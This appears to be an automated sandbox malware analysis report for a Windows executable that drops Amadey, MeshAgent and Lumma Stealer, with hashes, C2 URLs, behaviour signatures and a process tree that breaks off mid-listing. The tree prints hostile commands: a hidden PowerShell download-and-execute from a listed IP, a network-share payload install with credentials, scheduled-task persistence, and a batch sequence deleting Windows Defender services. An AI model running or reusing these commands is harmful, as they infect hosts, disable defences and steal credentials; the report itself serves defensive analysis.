Analysis

  • max time kernel
    103s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 23:51

General

  • Target

    2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    b19ff2ebc03f382529b2f8802b4bf39c

  • SHA1

    a648b3cfccbf7200eb03ccc69b57573b899937ec

  • SHA256

    6b45d4d0d453fff7c377439cd75cc088d684b95989e4ac65772757b9a3ce6f71

  • SHA512

    84ff2567b6417a3490f1828c121a7f4db96145d66d3d6eecdfaaa42ec25105385581b7637ee4cee385b69bf8effc3e3688c2690e8f2092a81bc5cbb6e543b48b

  • SSDEEP

    24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a0Du:YTvC/MTQYxsWR7a0D

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

meshagent

Version

2

Botnet

test123

C2

http://aaso12.duckdns.org:443/agent.ashx

Attributes
  • mesh_id

    0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C

  • server_id

    22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8

  • wss

    wss://aaso12.duckdns.org:443/agent.ashx

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://iplpepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects MeshAgent payload 1 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Contacts a large (7298) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 20 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 17 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 48 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 26 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn wlkDSmavZCz /tr "mshta C:\Users\Admin\AppData\Local\Temp\GrV9nDPUO.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn wlkDSmavZCz /tr "mshta C:\Users\Admin\AppData\Local\Temp\GrV9nDPUO.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4232
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\GrV9nDPUO.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Users\Admin\AppData\Local\TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE
          "C:\Users\Admin\AppData\Local\TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5500
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5176
            • C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe
              "C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2508
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1444
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1768
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3320
                  • C:\Windows\SysWOW64\net.exe
                    net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:5308
                  • \??\UNC\aaso12.duckdns.org\shear\s.exe
                    \\aaso12.duckdns.org\shear\s -fullinstall
                    9⤵
                    • Sets service image path in registry
                    • Drops file in Program Files directory
                    PID:2072
            • C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4544
              • C:\Users\Admin\AppData\Local\Temp\272.exe
                "C:\Users\Admin\AppData\Local\Temp\272.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3696
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A46E.tmp\A46F.tmp\A470.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4528
                  • C:\Users\Admin\AppData\Local\Temp\272.exe
                    "C:\Users\Admin\AppData\Local\Temp\272.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:6116
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A577.tmp\A578.tmp\A579.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:5952
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:3076
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:3800
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:4948
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:3552
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:4040
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:3032
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:60
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:5792
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:2828
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:2748
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:1200
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:1132
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:5920
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3464
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:5056
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:2552
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:4660
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:4076
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:2976
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:4080
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:5824
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                • Modifies security service
                                PID:1472
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:4600
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:1232
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                11⤵
                                  PID:3052
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:64
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1128
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  11⤵
                                    PID:4868
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:1864
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5948
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    11⤵
                                      PID:224
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:1000
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:1296
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      11⤵
                                        PID:6132
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4996
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5260
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        11⤵
                                          PID:6068
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2832
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:5636
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          11⤵
                                            PID:6100
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1604
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2144
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            11⤵
                                              PID:1792
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:812
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:5144
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              11⤵
                                                PID:4832
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:452
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1584
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                11⤵
                                                  PID:1148
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2348
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:3784
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  11⤵
                                                    PID:5788
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5024
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5736
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    11⤵
                                                      PID:4668
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      11⤵
                                                        PID:1480
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        11⤵
                                                          PID:5608
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          11⤵
                                                            PID:548
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            11⤵
                                                              PID:4924
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:3344
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:868
                                                  • C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe"
                                                    6⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2404
                                                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3816
                                                      • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4720
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          9⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4492
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                            10⤵
                                                            • Uses browser remote debugging
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:1732
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8cc4bdcf8,0x7ff8cc4bdd04,0x7ff8cc4bdd10
                                                              11⤵
                                                                PID:5692
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1972 /prefetch:2
                                                                11⤵
                                                                  PID:6128
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2204,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:3
                                                                  11⤵
                                                                    PID:1124
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2436 /prefetch:8
                                                                    11⤵
                                                                      PID:4176
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:1
                                                                      11⤵
                                                                      • Uses browser remote debugging
                                                                      PID:5668
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
                                                                      11⤵
                                                                      • Uses browser remote debugging
                                                                      PID:2444
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:2
                                                                      11⤵
                                                                      • Uses browser remote debugging
                                                                      PID:4700
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4416,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4608 /prefetch:1
                                                                      11⤵
                                                                      • Uses browser remote debugging
                                                                      PID:2760
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5160 /prefetch:8
                                                                      11⤵
                                                                        PID:2072
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5528,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5552 /prefetch:8
                                                                        11⤵
                                                                          PID:2224
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        10⤵
                                                                        • Uses browser remote debugging
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:1332
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
